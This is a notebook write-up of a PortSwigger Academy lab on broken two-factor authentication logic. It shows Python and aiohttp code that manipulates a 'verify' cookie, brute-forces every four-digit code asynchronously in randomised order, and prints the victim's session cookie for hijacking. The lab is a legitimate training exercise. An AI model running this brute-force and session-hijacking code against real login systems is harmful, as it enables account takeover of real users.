# Context

In a lab from Portswigger Academy, we are presented a situation where manipulating a cookie value will allow us to generate a 2FA verification code for the target account.
https://portswigger.net/web-security/authentication/multi-factor/lab-2fa-broken-logic

The goal from that point is to brute force the verification code (302 = success). 
Making the requests is the easy part (can use Burp Intruder), but the problem is the speed at which we arrive at the correct code. 4 digits is 10k (10 digits ^ 4) possibilities. We aren't necessarily able to 'vectorize' this operation, but we can make requests in larger batches asychronously.

In [1]:
import random
import requests
import asyncio
import aiohttp
import time

In [2]:
# Testing out the normal Requests logic and setting up our header + data payloads
# using the account we have access to to obtain the verification code.

cookies = {
    'session':'eGXnwz9tdrnIUuCuwu0znWm8O1Uiwh09',
    'verify':'wiener' # This is what enables the code to be generated
}

# CSRF prevention token - the post request will not work without it
csrf = 'RmdhFXKT0eYw6FFi1AgXiK19MOz7IYPP'

payload = {
    'csrf':csrf,
    'mfa-code':'1810'
}

# Code is generated when this page is visited
url = 'https://ac3a1f3b1f5a6b9c80e43b1d00f3000f.web-security-academy.net/login2'

# Need to have redirects disabled to confirm that the code is correct
attempt = requests.post(url=url, cookies = cookies, data = payload, allow_redirects=False)

print(attempt.status_code)
print(attempt.text)

302



In [3]:
# Test asynchronous method using aiohttp.

cookies = {
    'session':'eZnQvusDB4jE8UgK5PzetVGM7mcsoSJH',
    'verify':'wiener'
}

csrf = '62u51PRbJQCkr9XZ6ESXz0U4xMOrzc67'
payload = {
    'csrf':csrf,
    'mfa-code':'1530'
}
url = 'https://ac3a1f3b1f5a6b9c80e43b1d00f3000f.web-security-academy.net/login2'

# async and await must be used for these 'co-routines'
async with aiohttp.ClientSession(cookies=cookies) as session:
    async with session.post(url=url, data=payload, allow_redirects=False) as attempt:
        print(attempt.status)
        print(await attempt.text())

302



In [4]:
# Now to generate our fuzzing values (left padded w/zeroes). 
digits = 4
# Convert the integer range to strings left-padded with 0
possibilities = [f'{i:0{digits}}' for i in range(0, 10 ** digits)]

# Randomize order to make it less obvious.
random.seed(1337)
fuzzing = random.sample(possibilities, len(possibilities))

# Test outputs.
test = fuzzing[:10]
print(possibilities[:10], '\n', test)

['0000', '0001', '0002', '0003', '0004', '0005', '0006', '0007', '0008', '0009'] 
 ['8737', '5994', '9354', '9597', '2714', '5452', '6286', '5895', '5040', '6415']


In [7]:
# Speed test the standard looping method.
cookies = {
    'session':'kc5N4edDKcZavBrBCumKB4TpnhdECq2p',
    'verify':'wiener'
}

csrf = 'sXAvgAls9clDah7pMVVBChJNrGSLUp2v'
url = 'https://ac3a1f3b1f5a6b9c80e43b1d00f3000f.web-security-academy.net/login2'

sync_start = time.process_time()
with requests.Session() as s:
    s.cookies = requests.cookies.cookiejar_from_dict(cookies)
    for code in test:
        payload = {
        'csrf':csrf,
        'mfa-code':code
        }
        try:
            attempt = s.post(url=url, cookies=cookies, data=payload)
            print(f'Attempt {fuzzing.index(code) + 1}', attempt.status_code)
        except:
            pass
    
sync_perf = time.process_time() - sync_start
print(sync_perf)

Attempt 1 200
Attempt 2 200
Attempt 3 200
Attempt 4 200
Attempt 5 200
Attempt 6 200
Attempt 7 200
Attempt 8 200
Attempt 9 200
Attempt 10 200
0.374386278


In [8]:
# Speed test the async method

cookies = {
    'session':'kc5N4edDKcZavBrBCumKB4TpnhdECq2p',
    'verify':'wiener'
}

csrf = 'sXAvgAls9clDah7pMVVBChJNrGSLUp2v'
url = 'https://ac3a1f3b1f5a6b9c80e43b1d00f3000f.web-security-academy.net/login2'

# Create async function
async def attempt(code, lst, session):
    payload = {
        'csrf':csrf,
        'mfa-code':code
    }
    try:
        async with session.post(url=url, data=payload) as attempt:
            print(f'Attempt {lst.index(code) + 1}', code, attempt.status)
    except:
        pass
    
async_start = time.process_time()
async with aiohttp.ClientSession(cookies=cookies) as session:
    # Cap on max concurrent
    sem = asyncio.Semaphore(100)
    async with sem:
        await asyncio.gather(*[attempt(code, fuzzing, session) for code in test])
        
async_perf = time.process_time() - async_start
print(async_perf)

# Notice how these aren't in order since responses are retrieved asynchronously
# This method is 3-4x faster!

Attempt 4 9597 200
Attempt 8 5895 200
Attempt 9 5040 200
Attempt 10 6415 200
Attempt 2 5994 200
Attempt 7 6286 200
Attempt 1 8737 200
Attempt 3 9354 200
Attempt 6 5452 200
Attempt 5 2714 200
0.11750488699999995


In [15]:
# Let's obtain the code for carlos

cookies = {
    'session':'hyUmhBYCWJaWUEfRaI04pyDOB479kYgt',
    'verify':'carlos'
}

csrf = 'dxc9q3zYd1GOVmeSziNbQ9jjbY8QW262'
url = 'https://acb01fef1fb5a5de802f24a4009d005d.web-security-academy.net/login2'

async def attempt(code, lst, session):
    payload = {
        'csrf':csrf,
        'mfa-code':code
    }
    
    try:
        async with session.post(url=url, data=payload, allow_redirects=False) as attempt:
            # print(f'Attempt {lst.index(code) + 1}', code, attempt.status)
            if attempt.status == 302:
                # show the session cookie to hijack
                print(attempt.cookies['session'])
                # Stop the process since we have the right code. 
                # You may need to still kill the cell manually
                await session.close()
    except:
        pass

    
async with aiohttp.ClientSession(cookies=cookies) as session:
    # Cap on max concurrent
    sem = asyncio.Semaphore(100)
    async with sem:
        await asyncio.gather(*[attempt(code, fuzzing, session) for code in fuzzing])

Set-Cookie: session=iTNJU4GHBloSSjxXdKYCvK0gxbf79ir2; Domain=acb01fef1fb5a5de802f24a4009d005d.web-security-academy.net; HttpOnly; Path=/; Secure


CancelledError: 